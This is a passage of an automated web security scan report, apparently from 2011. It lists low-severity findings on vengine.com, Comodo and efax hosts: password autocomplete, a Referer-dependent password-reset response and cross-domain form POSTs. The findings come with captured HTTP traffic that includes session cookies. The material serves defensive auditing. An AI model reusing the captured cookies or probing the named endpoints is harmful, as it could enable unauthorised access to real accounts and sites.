Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.6.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:55 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">


Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.56. http://www.vengine.com/products/tour.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/tour.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/tour.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:11 GMT
Content-Type: text/html
Content-Length: 12345
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Ban
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.57. http://www.vengine.com/products/vengine/eula.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/eula.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/eula.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 18642
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.58. http://www.vengine.com/products/vengine/faq.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/faq.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:09 GMT
Content-Type: text/html
Content-Length: 14577
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Sit
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.59. http://www.vengine.com/products/vengine/first_time.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/first_time.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/first_time.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 10909
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Security
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.60. http://www.vengine.com/products/vengine/help.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/help.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/help.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:04 GMT
Content-Type: text/html
Content-Length: 12152
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Internet Fraudste
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.61. http://www.vengine.com/products/vengine/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/index.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:37 GMT
Content-Type: text/html
Content-Length: 11866
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Site Authenticati
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.62. http://www.vengine.com/products/vengine/options.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/options.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/options.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:07 GMT
Content-Type: text/html
Content-Length: 11277
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Anti Phishin
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.63. http://www.vengine.com/products/vengine/requirements.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/requirements.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/requirements.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:05 GMT
Content-Type: text/html
Content-Length: 10780
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Installing Verifi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.64. http://www.vengine.com/products/vengine/setup.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/setup.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/setup.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:06 GMT
Content-Type: text/html
Content-Length: 11624
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Anti Phi
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.65. http://www.vengine.com/products/vengine/ssl_feedback.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/ssl_feedback.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/ssl_feedback.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/vengine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.9.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:42:53 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 11376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificates
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.66. http://www.vengine.com/products/vengine/uninstall.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/vengine/uninstall.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/vengine/uninstall.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:08 GMT
Content-Type: text/html
Content-Length: 10248
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Download Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.67. http://www.vengine.com/sitemap.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /sitemap.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sitemap.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:16 GMT
Content-Type: text/html
Content-Length: 11070
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Sitemap - Anti Ph
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.68. http://www.vengine.com/support/faq.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/faq.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/faq.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:13 GMT
Content-Type: text/html
Content-Length: 15273
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.69. http://www.vengine.com/support/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /support/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/index.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/products/free_tools.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.3.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:23 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 9986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Anti Phishing Int
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

7.70. https://www.vengine.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:40 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

8. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://secure.instantssl.com
Path:   /products/passwordResetRequest

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: https://secure.instantssl.com/management/passwordResetRequest.html
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:20 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 449
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'https://secure.instantssl.com/management/passwordResetRequest.html'">
&nbsp;&nbsp;<input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

Request 2

POST /products/passwordResetRequest HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

orderNumber=4543252345324523453245&loginName=&emailAddress=4353245

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:13:51 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 383
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = ''">
&nbsp;&nbsp;<input type="button" class="input" value="Close Window" onClick="window.close()">
</body>
</html>

9. Cross-domain POST  previous  next
There are 44 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


9.1. http://efaxcorporate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://efaxcorporate.com
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page HTTP/1.1
Host: efaxcorporate.com
Proxy-Connection: keep-alive
Referer: http://home.j2.com/enterprise/enterprise.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:20 GMT
Server: Apache
Vary: Host,Accept-Encoding
X-Magnolia-Registration: Registered
Set-Cookie: JSESSIONID=37657A97FCC62C80A944C9835E8E0575.efaxcorp1b; Path=/efaxcorp-cms-public
Set-Cookie: brand=efaxcorp; Domain=.efaxcorporate.com; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:19:20 GMT
Content-Length: 56030
X-TWA-Web: pa:28012
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div style="width: 700px; margin-top: 90px;">
<form style="width: 700px;" method="POST" id="corporateInquiryForm" name="corporateInquiryForm" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8">
<input type="hidden" value="corporateInquiryForm" name="formName"/>
...[SNIP]...

9.2. http://efaxdeveloper.com/developer/signup  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://efaxdeveloper.com
Path:   /developer/signup

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /developer/signup HTTP/1.1
Host: efaxdeveloper.com
Proxy-Connection: keep-alive
Referer: http://efaxdeveloper.com/?utm_source=j2&utm_medium=cross+sell&utm_campaign=enterprise+page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS_JSESSIONID=GfhfT1hLPGT9699d9vcWJ3xgrF8M1QQ244SXv36VfyS6KssGwVWX!-244489612; lang=en; AKAINFO=client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3; mbox=check#true#1316366491|session#1316366430838-226146#1316368291|PC#1316366430838-226146.19#1318180833; __utma=1.1246933238.1316366432.1316366432.1316366432.1; __utmb=1.1.10.1316366432; __utmc=1; __utmz=1.1316366432.1.1.utmcsr=j2|utmccn=enterprise%20page|utmcmd=cross%20sell; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:19:48 GMT
Server: Apache
Cache-Control: max-age=43200, public
Pragma:
Content-Length: 51538
Expires: Mon, 19 Sep 2011 00:19:48 GMT
Last-Modified: Mon, 12 Sep 2011 10:27:24 GMT
X-Magnolia-Registration: Registered
Set-Cookie: lang=en; domain=efaxdeveloper.com; expires=Wednesday, 02-Nov-2011 12:19:48 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
